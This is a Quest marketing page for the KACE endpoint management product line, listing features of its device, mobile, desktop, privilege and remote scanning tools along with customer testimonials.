*   Customer Stories
*   News
*   Careers
*   Contact Us

Home / KACE Unified Endpoint Management

KACE® by Quest supports your unified endpoint management (UEM) strategy by helping you discover and track every device in your environment, automate administrative tasks, keep compliance requirements up-to-date and secure your network from a range of cyberthreats. With KACE, you can effectively address your endpoint management needs with individual products for specific tasks or as an integrated UEM solution.

**Key benefits**

**Discover**

Centralize systems management while gaining visibility and control through a single view of your assets

**Manage**

Efficiently manage your endpoint landscape and lifecycle while reducing complexity and automating tasks

**Secure**

Protect your endpoints while minimizing the risks of non-compliance with data protection and licensing requirements

**KACE Product Portfolio**

 02:41

**KACE Unified Endpoint Manager**

KACE Unified Endpoint Manager unites traditional endpoint management with modern management in a shared intuitive interface. Discover, manage and secure all your endpoints from one console as you co-manage your traditional and modern endpoints, including Windows and Mac laptops, and iOS and Android mobile devices. 

**Key Features**

*   Scan to discover devices and remotely provision them
*   Access a detailed inventory of data on each traditional device
*   Define policies and administrative functions for a single device or group of devices
*   Autonomously track, deploy and maintain current versions of software and applications
*   Automate patch identification and deployment

 01:58

 01:54

 01:37

**KACE Cloud Mobile Device Manager**

Inventory, manage and secure the mobile devices in your environment with KACE Cloud Mobile Device Manager. Get a simple, straightforward, cloud-based solution for mobile device management. Enjoy single-pane-of-glass management for both mobile and traditional devices when combined with the KACE Systems Management Appliance.

**Key Features**

*   Powerful device control
*   BYOD and company-owned device support
*   Android and iOS Support

 02:01

**KACE Desktop Authority**

Use KACE Desktop Authority to eliminate the hassle of deploying and securing network-connected devices by customizing them at first login. Easily configure firewall and browser security settings for physical, virtual and published Windows environments. Ensure that applications are maintained and access to network resources is always available.

**Key Features**

*   Flexible criteria-based settings and configurations
*   Windows environment management
*   Remote user support
*   Device security

 02:00

**KACE Privilege Manager**

Maintain a least-privileged, GDPR-compliant environment with KACE Privilege Manager. Quickly elevate and manage your organization’s end users and administrative rights. Give users an easier and more affordable way to maintain security using self-service capabilities in a locked-down PC environment.

**Key Features**

*   Elevation on-demand
*   Criteria-based assignment of access rights
*   Digital certification verification
*   Application blacklisting

 01:26

**RemoteScan**

Simplify your document scanning workflow and make sure that images are securely stored on the server and not at the endpoint with RemoteScan. Support remote desktop scanning for terminal server and cloud environments while easily meeting compliance requirements by using secure virtual channels to transmit scanned images at fast scanning speeds, even over complex networks.

**Key Features**

*   Supports TWAIN scanning software applications
*   Connects scanners in remote desktop environments
*   Complies with enterprise requirements
*   Supports TWAIN, WIA and ScanSnap drivers

**Resources**

**Awards**

**St. Dominic Hospital**

The KACE Systems Management Appliance has made life a whole lot easier. We can see asset information and software details, down to the version. I mean, it's been the ultimate timesaver.

Rudy Bracey Systems Administrator, St. Dominic Hospital Read Case Study

**Coastal Community Credit Union**

KACE is a one-stop shop for our biggest IT needs. Sabrina Geoffroy, Technical Business Analyst, Coastal Community Credit Union

Sabrina Geoffroy Technical Business Analyst, Coastal Community Credit Union Read Case Study

**Maniilaq Association**

I know I implemented RemoteScan in a brand-new way, but the software was flexible enough to allow it. That was the big bonus

Wayne Hogue VMware Administrator, Maniilaq Association Read Case Study

Tag

#firefox